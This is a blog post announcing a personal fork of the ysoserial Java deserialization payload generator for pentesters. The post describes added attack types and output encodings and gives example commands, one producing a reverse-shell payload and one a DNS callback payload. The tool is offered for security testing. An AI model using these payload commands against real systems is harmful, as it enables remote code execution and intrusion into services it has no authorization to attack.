Hi! During the years many people ask to me the code I used to generate payloads of Java Deserialization Scanner. These payloads are generated with a customized version of Chris Frohoff ‘s ysoserial, which I have now decided to publish because maybe can be useful to other pentesters.

My forked version initially outputted DNS and TIME attack vectors in addiction to the classical EXEC ones.

During the years I added other features to the tool, like OS-specific EXEC attack vectors (generic ones is limited on the allowed chars) and output processing functions to transform/compress/encode the output of ysoserial (supports multiple transformations comma-separated).

Finally, I integrated the code of the following useful ysoserial pull requests not (already) merged with the main repository:

Pure Java reverse shell by Nicky Bloor for TemplatesImpl gadgets

by Nicky Bloor for TemplatesImpl gadgets XStream serializer by Isaac Sears

The fork should be compatible with tools that use ysoserial (without supplying the addition arguments default to “exec_global”, ysoserial default behavior).

Some examples of ysoserial commands are the following (detailed instructions can be found on the repository of the tool):

java -jar ysoserial-fd-0.0.6.jar CommonsCollections1 “echo AAA > a.txt” exec_win base64,url_encoding

java -jar ysoserial-fd-0.0.6.jar Jdk7u21 10000 sleep xstream

java -jar ysoserial-fd-0.0.6.jar CommonsCollections2 “127.0.0.1:8888” reverse_shell

java -jar ysoserial-fd-0.0.6.jar Spring1 “yourcollaboratorpayload.burpcollaborator.net” dns gzip,ascii_hex

I published the code on GitHub in my ysoserial fork. I will try to maintain the fork aligned with ysoserial codebase.

For now, I will not execute a pull request to the main ysoserial repository because some of my changes can’t be applied to all the ysoserial plugins: they require the execution of arbitrary Java code and many plugins execute other tasks (file upload, execution of EL expressions, …). In these situations, obviously, the modified version can execute the original ysoserial payload (all original features should work correctly), but I think that the author prefers to keep the tool clean without adding code not applicable to entire payload set (looking at the open/close pull requests).

In release page there are two JARs:

ysoserial-fd-0.0.6.jar

ysoserial-fd-0.0.6-hibernate5.jar, compiled with the “hibernate5” profile necessary to exploit hibernate5 issues (you have to run the JAR with the -Dhibernate5 option)

Links:

I don’t guarantee at all the absence of bugs in this fork! Use it at your own risk and if you doubt on some behaviors try also with the original ysoserial. This is a quick-and-dirty modifications and all the “test” features of ysoserial have not been tested! 🙂

An extract of the help menu of the modified ysoserial:

Usage: java -jar ysoserial-fd-0.0.6.jar payload 'command' attack_type payload_transformations attack_type is optional and default to exec_global (ysoserial standard) payload_transformations is optional and is a comma-separeted list of encoding and compressions that will be applied in order on the payload ... Available attack types: exec_global exec_win exec_unix sleep dns reverse_shell Available transformations: xstream (if xstream is chosen other transformations will be discarded) base64 base64_url_safe url_encoding ascii_hex gzip zlib 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 Usage : java - jar ysoserial - fd - 0.0.6.jar payload 'command' attack_type payload_transformations attack_type is optional and default to exec_global ( ysoserial standard ) payload_transformations is optional and is a comma - separeted list of encoding and compressions that will be applied in order on the payload . . . Available attack types : exec_global exec_win exec_unix sleep dns reverse_shell Available transformations : xstream ( if xstream is chosen other transformations will be discarded ) base64 base64_url_safe url_encoding ascii_hex gzip zlib

Cheers!